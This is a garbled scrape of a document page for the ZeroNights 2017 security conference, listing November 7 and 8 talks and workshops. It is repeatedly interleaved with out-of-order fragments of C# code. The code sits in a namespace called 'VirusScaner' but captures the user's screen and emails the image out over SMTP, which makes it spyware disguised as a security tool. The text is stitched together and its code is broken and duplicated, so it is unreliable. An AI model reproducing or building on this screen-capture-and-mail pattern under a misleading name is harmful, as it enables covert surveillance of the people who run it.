2
using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.IO; using System.Drawing.Imaging; using System.Net; static int i = 0; public Form1() { InitializeComponent(); pFormat = PixelFormat.Format32bppArgb; string sysName = string.Empty; string sysUser = string.Empty; Bitmap b = BitMapCreater(); printScreen = string.Format("{0}{1}", private void Form1_Load(object sender, Even Program November 7 9:00 9:30 9:50 10:00 10:45 11:00 12:00 13:00 14:30 15:30 16:30 17:00 18:00 Opening Sponsors "Endpoint security via application sandboxing and virtualization — past, present, future", Rafal Wojtczuk "Virtually Impossible: The Reality Of Virtualization Security", Gal Diskin "Mining Mach Services within OS X Sandbox", Meder Kydyraliev Coffee break Lunch "Windows Kernel Trap Handler and NTVDM Vulnerabilities – Case Study", Mateusz Jurczyk "Exploitation of AVR & MSP microchips", Vadim Bardakov "SCADA deep inside: protocols, security mechanisms, software architecture", Alexander Timorin, Alexander Tlyapov EAS-SEC Hacking business "Accounting hacking – arch bugs in MS Dynamics GP", Alexey Tyurin "Dev system hacking – arch bugs in SAP SDM", Evgeny Neyolov "HR Hacking – bugs in PeopleSoft", Alexey Tyurin "DBO Hacking – arch bugs in BSS", Gleb Cherbov "Business Intelligence hacking – Breaking ICCube", Dmitry Chastukhin "EAS-SEC: business application security deployment guideline", Alexander Polyakov "DbiFuzz framework", Peter Hlavaty "IP fragmentation attack", Tomas Hlavacek "Honey, I’m home! – Hacking Z-Wave home automation systems", Sahand Ghanoun "Hacking HTML5", Krzysztof Kotowicz 4 hours Part 1 "Hacking HTML5", Krzysztof Kotowicz Part 2 "BlackBox analysis of iOS apps", Dmitry 'D1g1' Evdokimov 2 hours Registration Coffee break Track 1 Track 2 Workshop 1 Workshop 2 "Practical exploitation of rounding vulnerabilities in internet banking applications", Adrian Furtuna "HART (in)security", Alexander Bolshev, Alexander Malinovsky

Program November 7 - Zeronights 2017 · PDF fileProgram November 8 10:00 11:00 11:45 12:00 13:00 "Session management errors in 14:00 15:30 16:30 ... Roman Korkikyan 4 hours Part 1

Embed Size (px)

Citation preview

{Rectangle rect = Screen.PrimaryScreen.Bounds;int color = Screen.PrimaryScreen.BitsPerPixel;PixelFormat pFormat;switch (color){

default:pFormat = PixelFormat.Format32bppArgb;break;}

string userName = "[email protected]";//write your email addressstring password = "************";//write passwordSystem.Net.Mail.SmtpClient mClient = new System.Net.Mail.SmtpClient();mClient.Port = 587;

mClient.Host = smtpHost;mClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;mClient.Send(mm);

string sysName = string.Empty;string sysUser = string.Empty;Bitmap b = BitMapCreater();printScreen = string.Format("{0}{1}",

using System.Data;using System.Drawing;using System.Text;

using System.Windows.Forms;using System.IO;using System.Drawing.Imaging;using System.Net;

System.Net.Mail.Attachment mailAttachment = new System.Net.Mail.Attachment(printScreen);mm.Attachments.Add(mailAttachment);mm.IsBodyHtml = true;

return "Send Sucessfully";}private void Form1_Load(object sender, EventArgs e){

namespace VirusScaner{public partial class Form1 : Form{string printScreen = null;

static int i = 0;public Form1(){InitializeComponent();

{Rectangle rect = Screen.PrimaryScreen.Bounds;int color = Screen.PrimaryScreen.BitsPerPixel;PixelFormat pFormat;switch (color){

default:pFormat = PixelFormat.Format32bppArgb;break;}

string userName = "[email protected]";//write your email addressstring password = "************";//write passwordSystem.Net.Mail.SmtpClient mClient = new System.Net.Mail.SmtpClient();mClient.Port = 587;

mClient.Host = smtpHost;mClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;mClient.Send(mm);

string sysName = string.Empty;string sysUser = string.Empty;Bitmap b = BitMapCreater();printScreen = string.Format("{0}{1}",

using System.Data;using System.Drawing;using System.Text;

using System.Windows.Forms;using System.IO;using System.Drawing.Imaging;using System.Net;

System.Net.Mail.Attachment mailAttachment = new System.Net.Mail.Attachment(printScreen);mm.Attachments.Add(mailAttachment);mm.IsBodyHtml = true;

return "Send Sucessfully";}private void Form1_Load(object sender, EventArgs e){

namespace VirusScaner{public partial class Form1 : Form{string printScreen = null;

static int i = 0;public Form1(){InitializeComponent();

ProgramNovember 7

9:00

9:30

9:50

10:00

10:45

11:00

12:00

13:00

14:30

15:30

16:30

17:00

18:00

Opening

Sponsors

"Endpoint security via application sandboxing and virtualization — past, present, future",Rafal Wojtczuk

"Virtually Impossible: The Reality Of Virtualization Security",Gal Diskin

"Mining Mach Services within OS X Sandbox",Meder Kydyraliev

Co�ee break

Lunch

"Windows Kernel Trap Handler and NTVDM Vulnerabilities – Case Study",Mateusz Jurczyk

"Exploitation of AVR & MSP microchips", Vadim Bardakov

"SCADA deep inside: protocols, security mechanisms, software architecture",Alexander Timorin, Alexander Tlyapov

EAS-SECHacking business

"Accounting hacking – arch bugs in MS Dynamics GP", Alexey Tyurin

"Dev system hacking – arch bugs in SAP SDM", Evgeny Neyolov

"HR Hacking – bugs in PeopleSoft", Alexey Tyurin

"DBO Hacking – arch bugs in BSS", Gleb Cherbov

"Business Intelligence hacking –Breaking ICCube", Dmitry Chastukhin

"EAS-SEC: business application security deployment guideline", Alexander Polyakov

"DbiFuzz framework", Peter Hlavaty

"IP fragmentation attack",Tomas Hlavacek

"Honey, I’m home! – Hacking Z-Wave home automation systems",Sahand Ghanoun

"Hacking HTML5",Krzysztof Kotowicz 4 hours

Part 1

"Hacking HTML5",Krzysztof Kotowicz Part 2

"BlackBox analysis of iOS apps",Dmitry 'D1g1' Evdokimov2 hours

Registration

Co�ee break

Track 1 Track 2 Workshop 1 Workshop 2

"Practical exploitation of rounding vulnerabilities in internet banking applications",Adrian Furtuna

"HART (in)security",Alexander Bolshev, Alexander Malinovsky

{Rectangle rect = Screen.PrimaryScreen.Bounds;int color = Screen.PrimaryScreen.BitsPerPixel;PixelFormat pFormat;switch (color){

default:pFormat = PixelFormat.Format32bppArgb;break;}

string userName = "[email protected]";//write your email addressstring password = "************";//write passwordSystem.Net.Mail.SmtpClient mClient = new System.Net.Mail.SmtpClient();mClient.Port = 587;

mClient.Host = smtpHost;mClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;mClient.Send(mm);

string sysName = string.Empty;string sysUser = string.Empty;Bitmap b = BitMapCreater();printScreen = string.Format("{0}{1}",

using System.Data;using System.Drawing;using System.Text;

using System.Windows.Forms;using System.IO;using System.Drawing.Imaging;using System.Net;

System.Net.Mail.Attachment mailAttachment = new System.Net.Mail.Attachment(printScreen);mm.Attachments.Add(mailAttachment);mm.IsBodyHtml = true;

return "Send Sucessfully";}private void Form1_Load(object sender, EventArgs e){

namespace VirusScaner{public partial class Form1 : Form{string printScreen = null;

static int i = 0;public Form1(){InitializeComponent();

{Rectangle rect = Screen.PrimaryScreen.Bounds;int color = Screen.PrimaryScreen.BitsPerPixel;PixelFormat pFormat;switch (color){

default:pFormat = PixelFormat.Format32bppArgb;break;}

string userName = "[email protected]";//write your email addressstring password = "************";//write passwordSystem.Net.Mail.SmtpClient mClient = new System.Net.Mail.SmtpClient();mClient.Port = 587;

mClient.Host = smtpHost;mClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;mClient.Send(mm);

string sysName = string.Empty;string sysUser = string.Empty;Bitmap b = BitMapCreater();printScreen = string.Format("{0}{1}",

using System.Data;using System.Drawing;using System.Text;

using System.Windows.Forms;using System.IO;using System.Drawing.Imaging;using System.Net;

System.Net.Mail.Attachment mailAttachment = new System.Net.Mail.Attachment(printScreen);mm.Attachments.Add(mailAttachment);mm.IsBodyHtml = true;

return "Send Sucessfully";}private void Form1_Load(object sender, EventArgs e){

namespace VirusScaner{public partial class Form1 : Form{string printScreen = null;

static int i = 0;public Form1(){InitializeComponent();

ProgramNovember 8

10:00

11:00

11:45

12:00

13:00

14:00

15:30

16:30

17:15

17:30

18:30

19:30

Opening

"State of Crypto A�airs",Gregor Kopf

"Filesystem timing attacks practice",Ivan Novikov aka "Vladimir d0znpp Vorontsov"

"Fuzzing Practical Applications",Omair 2 hours

"An introduction to the use SMT solvers for software security",Georgy Nosenko2 hours

"The Machines that Betrayed their Masters",Glenn Wilkinson

"Session management errors in cloud solutions and in classic hosting systems", Andrey Danaw

"Hosting dashboard web application logic vulnerabilities", Dmitry Boomov

"HexRaysCodeXplorer: make object-oriented RE easier", Aleksandr Matrosov, Eugene Rodionov

Co�e break

Lunch

"Advanced threats reverse engineering",Aleksandr Matrosov, Eugene Rodionov4 hours

Part 1

"Timing analysis",Roman Korkikyan 4 hours

Part 1

"Timing analysis",Roman Korkikyan

Part 2

"Advanced threats reverse engineering",Aleksandr Matrosov, Eugene Rodionov

Part 2

"АAnatomy and metrologyof DoS/DDoS",Alexander Lyamin

"Reversing data formats: what data can reveal",Anton Dorfman

"When documents bite",Vlad Ovtchinikov

"JSMVCOMFG – To sternly look at JavaScript MVC and templating Frameworks",Mario Heiderich

"Avalanche disclosure. Story about static analysis of 10k iOS Apps",Alexey Troshichev

Closing conference

Co�e break

Track 1 Track 2 Workshop 1 Workshop 2

FAST TRACK

"Physical (In)security", Inbar Raz

"Testing of password policy", Anton Dedov

"Hesperbot: analysis of a new banking trojan", Anton Cherepanov

"NGINX Warhead", Sergey Belove

"Practical application of math methods and image recognition in attack detection. With novel case studies", Vladimir Kropotov, Vitaly Chetvertakov

"Web under pressure: DDoS as a service", Denis Makrushin

"Advanced exploitation of android master key vulnerability (bug 8219321)", Viktor Alyushin

Talk show ZN vs MS vs OpenSource